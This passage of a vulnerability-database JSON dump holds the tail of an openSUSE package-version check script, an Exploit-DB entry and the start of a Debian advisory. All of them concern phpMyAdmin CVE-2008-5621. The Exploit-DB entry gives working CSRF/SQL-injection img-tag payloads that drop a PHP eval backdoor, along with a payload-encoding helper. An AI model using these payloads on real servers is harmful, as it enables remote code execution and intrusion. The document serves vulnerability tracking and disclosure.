rpm:\"libavahi-glib1~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mailman\", rpm:\"mailman~2.1.11~8.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-Bootloader\", rpm:\"perl-Bootloader~0.4.81.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"plotutils\", rpm:\"plotutils~2.5~197.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pure-ftpd\", rpm:\"pure-ftpd~1.0.21~182.32.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p17~10.36.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tsclient\", rpm:\"tsclient~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tsclient-devel\", rpm:\"tsclient-devel~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xrdp\", rpm:\"xrdp~0.4.1~16.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-bootloader\", rpm:\"yast2-bootloader~2.17.50~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network\", rpm:\"yast2-network~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network-devel-doc\", rpm:\"yast2-network-devel-doc~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils-gtk\", rpm:\"avahi-utils-gtk~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~119.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", rpm:\"libnasl~2.2.10~59.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-debug\", rpm:\"nouveau-kmp-debug~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-default\", rpm:\"nouveau-kmp-default~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-pae\", rpm:\"nouveau-kmp-pae~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-xen\", rpm:\"nouveau-kmp-xen~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p15~13.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~76.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau\", rpm:\"xorg-x11-driver-video-nouveau~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau-3d\", rpm:\"xorg-x11-driver-video-nouveau-3d~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl\", rpm:\"avahi-compat-howl~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder\", rpm:\"avahi-compat-mDNSResponder~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-devel\", rpm:\"avahi-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-glib\", rpm:\"avahi-glib~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-python\", rpm:\"avahi-python~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt3\", rpm:\"avahi-qt3~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt4\", rpm:\"avahi-qt4~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~75.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", rpm:\"libnasl~2.2.10~15.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p2~23.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~33.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T03:05:41", "description": "phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability. CVE-2008-5621. Webapps exploit for php platform", "published": "2008-12-08T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 3.1.0 - CSRF SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5621"], "modified": "2008-12-08T00:00:00", "id": "EDB-ID:7382", "href": "https://www.exploit-db.com/exploits/7382/", "sourceData": "Written by Michael Brooks\r\nSpecial Thanks to str0ke and rGod\r\n\r\nIntro:\r\nphpMyAdmin is by far the most popular PHP project. Between\r\nphpmyadmin and the xampp project there are more than 34+ million\r\ndownloads from sourceforge.net . This exploit was released along\r\nside XSRF attacks against XAMPP and Simple Directory Listing\r\neffectively breaking the top 3 php projects in the same day.\r\n\r\nVulnerable Software info:\r\nSQL injection in phpMyAdmin by means of XSRF.\r\nExploit tested on Version 3.1.0 release on: 2008-12-01\r\nWorks with magic_quotes_gpc=On or Off.\r\n\r\nExploit information:\r\nThis is a Remote php code execution PoC exploit. The exploit is\r\ndropping a php backdoor into /var/www/backdoor.php, this attack will\r\nnot work on the newest Ubuntu or Fedora... machines due to AppArmor\r\nand SELinux respectively.\r\n\r\nThis is a XSRF attack to access SQL Injection so the same rules for\r\nexecuting XSRF attacks still apply.\r\nSteps for exploitation:\r\n1)The Victim's browser must be authenticated to phpMyAdmin at the time\r\nof attack.\r\n2)You must know the URL to phpMyAdmin.\r\n3)Finly, to execute the attack the Victim's browser then needs to\r\nview the malicious img tag:\r\n\r\nExploit for *nix:\r\n<html>\r\n<img src=\"http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+63%2C+62%29+into+outfile+%22%2Fvar%2Fwww%2Fbackdoor.php%22+--+1\">\r\n</html>\r\npath:\r\n/var/www/backdoor.php\r\nbackdoor:\r\n<?php eval($_GET[e]);?>\r\n\r\nExploit for a Default XAMPP for Windows Version 1.6.8:\r\n<html>\r\n<img src=\"http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+115%2C+116%2C+114%2C+105%2C+112%2C+115%2C+108%2C+97%2C+115%2C+104%2C+101%2C+115%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+41%2C+59%2C+63%2C+62%29+into+outfile+%22c%3A%2Fxampp%2Fhtdocs%2Fbackdoor.php%22+--+1\">\r\n</html>\r\npath:\r\nc:/xampp/htdocs/backdoor.php\r\nbackdoor:\r\n<?php eval(stripslashes($_GET[e]));?>\r\n\r\nThe backdoor can be accessed via\r\nhttp://10.1.1.10/backdoor.php?e=phpinfo();\r\n\r\nAs a side note, this attack is only GET based so no JavaScript or\r\nActionScript required! Screw you NoScript!!!\r\n\r\n\r\nTechnical Details:\r\nThe exact sql query that is being executed:\r\nSELECT COUNT(*) FROM `TABLES` where 0 union select char(60, 63, 112,\r\n104, 112, 32, 101, 118, 97, 108, 40, 36, 95, 71, 69, 84, 91, 101, 93,\r\n41, 63, 62) into outfile \"/var/www/backdoor.php\" -- 1`;\r\n\r\nThe char() mysql function is being used because the first SQL query is\r\nselecting integer values. The following php code can be used to\r\nbuild a custom payload, the current payload is: <?php\r\neval($_GET[e])?>\r\n\r\n<?php\r\nprint charEncode($_GET[code]);\r\nfunction charEncode($string){\r\n\t$char=\"char(\";\r\n\t$size=strlen($string);\r\n\tfor($x=0;$x<$size;$x++){\r\n\t\t$char.=ord($string[$x]).\", \";\r\n\t}\r\n\t$char[strlen($char)-2]=\")%00\";\r\n\treturn $char;\r\n}\r\n?>\r\nretroGod showed me this encoding method back when milw0rm still had a forum.\r\n\r\nBy default, if this query is malformed it will redirect you to a\r\nblank query window. This fooled me for a while, but then I modified\r\na line and then I could see that I was in fact causing a mysql error.\r\n./phpmyadmin/libraries/dbi/mysql.dbi.lib.php line 126:\r\nreturn mysql_query($query,$link);\r\nchange it to:\r\nreturn mysql_query($query,$link) or die($query.\"<br>\".mysql_error($link));\r\n\r\nThe query that is vulnerable to sql injection is being built in\r\n./phpmyadmin/libraries/db_table_exists.lib.php on line: 63\r\n\t\t$_result = PMA_DBI_try_query(\r\n 'SELECT COUNT(*) FROM `' .\r\nPMA_sqlAddslashes($table, true) . '`;',\r\n null, PMA_DBI_QUERY_STORE);\r\n\t\t\r\nThe PMA_sqlAddslashes() only disrupts the use of single quotes '.\r\nThis function doesn't protect against sql injection because it ignores\r\nback-ticks ` and double-quotes \".\r\n\r\n\r\nThis attack is not a textbook example of XSRF, because phpMyAdmin does\r\nhave protection against XSRF. The token used to protect requests is\r\ngenerated in a secure manner:\r\n./phpmyadmin/libraries/session.ic.php line 96:\r\nif (!isset($_SESSION[' PMA_token '])) {\r\n $_SESSION[' PMA_token '] = md5(uniqid(rand(), true));\r\n}\r\nAs a note the call to md5(); is superstitious. It doesn't add nor\r\ndoes it subtract to the session security. Possible md5() collisions do\r\nnot affect the integrity of the cryptographic nonce.\r\n\r\nThe vulnerability is because some request variables are exempt from\r\ntoken's protection. For instance the request variables 'db' and\r\n'table' used in the attack are not unset().\r\n./phpmyadmin/libraries/common.inc.php line 389:\r\nif (! PMA_isValid($_REQUEST['token']) || $_SESSION[' PMA_token '] !=\r\n$_REQUEST['token']) {\r\n /**\r\n * List of parameters which are allowed from unsafe source\r\n */\r\n $allow_list = array(\r\n /* needed for direct access, see FAQ 1.34\r\n * also, server needed for cookie login screen (multi-server)\r\n */\r\n 'server', 'db', 'table', 'target',\r\n /* Session ID */\r\n 'phpMyAdmin',\r\n /* Cookie preferences */\r\n 'pma_lang', 'pma_charset', 'pma_collation_connection',\r\n /* Possible login form */\r\n 'pma_servername', 'pma_username', 'pma_password',\r\n /* rajk - for playing blobstreamable media */\r\n 'media_type', 'custom_type', 'bs_reference',\r\n /* rajk - for changing BLOB repository file MIME type */\r\n 'bs_db', 'bs_table', 'bs_ref', 'bs_new_mime_type'\r\n );\r\n /**\r\n * Require cleanup functions\r\n */\r\n require_once './libraries/cleanup.lib.php';\r\n /**\r\n * Do actual cleanup\r\n */\r\n PMA_remove_request_vars($allow_list);\r\n\r\n}\r\n\r\nand PMA_remove_request_vars() is in ./phpmyadmin/librarires/cleanup.lib.php:\r\n\r\nfunction PMA_remove_request_vars(&$whitelist)\r\n{\r\n // do not check only $_REQUEST because it could have been overwritten\r\n // and use type casting because the variables could have become\r\n // strings\r\n $keys = array_keys(array_merge((array)$_REQUEST, (array)$_GET,\r\n(array)$_POST, (array)$_COOKIE));\r\n\r\n foreach($keys as $key) {\r\n if (! in_array($key, $whitelist)) {\r\n unset($_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);\r\n } else {\r\n // allowed stuff could be compromised so escape it\r\n // we require it to be a string\r\n if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {\r\n unset($_REQUEST[$key]);\r\n }\r\n if (isset($_POST[$key]) && ! is_string($_POST[$key])) {\r\n unset($_POST[$key]);\r\n }\r\n if (isset($_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {\r\n unset($_COOKIE[$key]);\r\n }\r\n if (isset($_GET[$key]) && ! is_string($_GET[$key])) {\r\n unset($_GET[$key]);\r\n }\r\n }\r\n }\r\n}\r\nAs a note, the & in this function declaration\r\nPMA_remove_request_vars(&$whitelist) means to pass the variable by\r\nreference, however this function doesn't use that variable reference.\r\n Again this is superstitious because it has no effect on the code\r\nits self.\r\n\r\n# milw0rm.com [2008-12-08]\r\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7382/"}], "debian": [{"lastseen": "2020-08-12T00:51:12", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5621"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1723-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nFebruary 11, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : phpmyadmin\nVulnerability : insufficient input sanitising\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-5621\n\nMichael Brooks discovered that phpMyAdmin, a tool to administrate MySQL\nover the web, performs insufficient 